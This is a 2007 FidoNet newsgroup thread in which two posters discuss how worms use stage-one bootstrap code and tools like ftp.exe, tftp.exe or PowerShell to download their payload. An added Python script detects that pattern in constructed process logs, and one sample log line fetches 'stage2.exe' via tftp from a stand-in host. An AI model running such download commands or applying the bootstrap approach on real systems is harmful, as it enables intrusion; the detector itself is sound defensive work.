echo: nthelp
to: Geo.
from: Rich
date: 2007-02-13 19:04:42
subject: Re: Writing a worm

From: "Rich" 


   Either way you have to have your worm, which would almost always be sent as native code, create a new process which could be ftp.exe et al., cmd.exe, or powershell.exe.  All the extra level of indirection gets you is complexity.  All a dependency on powershell.exe gets you is a much smaller number of potential targets.  It's simpler and probably smaller to use native code.

Rich
  "Geo."  wrote in message news:45d27a83$3{at}w3.nls.net...
  So with Monad it's not like cmd, you have to start up some environment, not use the default?

  Geo.

  "Rich"  wrote in message news:45d26fca$1{at}w3.nls.net...
     I understand.  With your example you would be better using native code to call ftp, tftp, or whatever instead of native code to call PowerShell and then have it call ftp, tftp, or whatever.

  Rich
    "Geo."  wrote in message news:45d26a23{at}w3.nls.net...
    The way you get in with a worm typically is by executing some simple code that then downloads the worm executable, sort of like a bootstrap operation. Things like scripting make it easier to do that stage one and get the download going.

    Granted, not always required, as an example SQL Server worm didn't need to use this technique, but most do. Certainly the latest NT worms, including the ones that hit NT4 machines, use this technique. They also use other handy stuff like ftp.exe or tftp.exe. The more capabilities, the easier it is to infect a system.

    That's why the old Macs were considered so secure, there just wasn't much to work with. It's also why if Linux gets much more popular the virus problem there will be far worse than anything we've seen on Windows.

    Geo.

    "Rich"  wrote in message news:45d1e42e$1{at}w3.nls.net...
       That's what I meant by "bypass the user".  Makes no difference.

    Rich

      "Geo."  wrote in message news:45d19efa$2{at}w3.nls.net...
      Think worms, not trojans. No user required.

      Geo.

      "Rich"  wrote in message news:45d131f1$1{at}w3.nls.net...
         Why?  If you can fool or bypass the user to run a program you may as well run a native program.

      Rich
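A defender's view of the stage-one bootstrap pattern discussed in this thread (a network-facing service spawning ftp.exe, tftp.exe, cmd.exe or powershell.exe to fetch the real payload): an added example, not part of the original thread, that flags such launches in constructed process-creation log lines. The log format, the list of service parents and every sample value are assumptions made here, not real telemetry.

```python
import re

# Constructed assumption: these parent images are treated as network-facing
# services that should never need to spawn a downloader or a shell.
SERVICE_PARENTS = {"sqlservr.exe", "inetinfo.exe", "svchost.exe", "lsass.exe"}
# The stage-one helpers named in the thread.
STAGE_ONE_TOOLS = {"ftp.exe", "tftp.exe", "cmd.exe", "powershell.exe"}

# Simplified, constructed process-creation log format (not real Sysmon output).
LINE_RE = re.compile(
    r'^(?P<ts>\S+) ProcessCreate parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"$'
)

def parse_event(line: str) -> "dict | None":
    """Return the event fields, with parent/image reduced to a lowercase basename."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    for key in ("parent", "image"):
        ev[key] = ev[key].rsplit("\\", 1)[-1].lower()
    return ev

def is_suspicious(ev: dict) -> bool:
    """A service spawning a download/launcher tool matches the bootstrap pattern."""
    return ev["parent"] in SERVICE_PARENTS and ev["image"] in STAGE_ONE_TOOLS

def scan(lines) -> list:
    """Return one alert string per suspicious event; unparseable lines are skipped."""
    return [
        f"{ev['ts']} {ev['parent']} -> {ev['image']}: {ev['cmdline']}"
        for ev in map(parse_event, lines)
        if ev and is_suspicious(ev)
    ]

# Constructed sample lines: two bootstrap-style launches, two benign, one malformed.
SAMPLE_LOG = [
    r'2007-02-13T19:04:42Z ProcessCreate parent=C:\MSSQL\Binn\sqlservr.exe '
    r'image=C:\WINNT\system32\cmd.exe cmdline="cmd.exe /c tftp.exe -i 192.0.2.10 GET stage2.exe"',
    r'2007-02-13T19:04:43Z ProcessCreate parent=C:\WINNT\system32\inetinfo.exe '
    r'image=C:\WINNT\system32\ftp.exe cmdline="ftp.exe -s:script.txt 192.0.2.10"',
    r'2007-02-13T19:05:00Z ProcessCreate parent=C:\WINNT\explorer.exe '
    r'image=C:\WINNT\system32\cmd.exe cmdline="cmd.exe"',
    r'2007-02-13T19:05:01Z ProcessCreate parent=C:\WINNT\system32\svchost.exe '
    r'image=C:\WINNT\system32\wuauclt.exe cmdline="wuauclt.exe"',
    "garbage line that does not parse",
]
```

Running `scan(SAMPLE_LOG)` yields two alerts (sqlservr.exe spawning cmd.exe and inetinfo.exe spawning ftp.exe); the explorer.exe and svchost.exe lines are not flagged.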



--- BBBS/NT v4.01 Flag-5
* Origin: Barktopia BBS Site http://HarborWebs.com:8081 (1:379/45)

SOURCE: echomail via fidonet.ozzmosis.com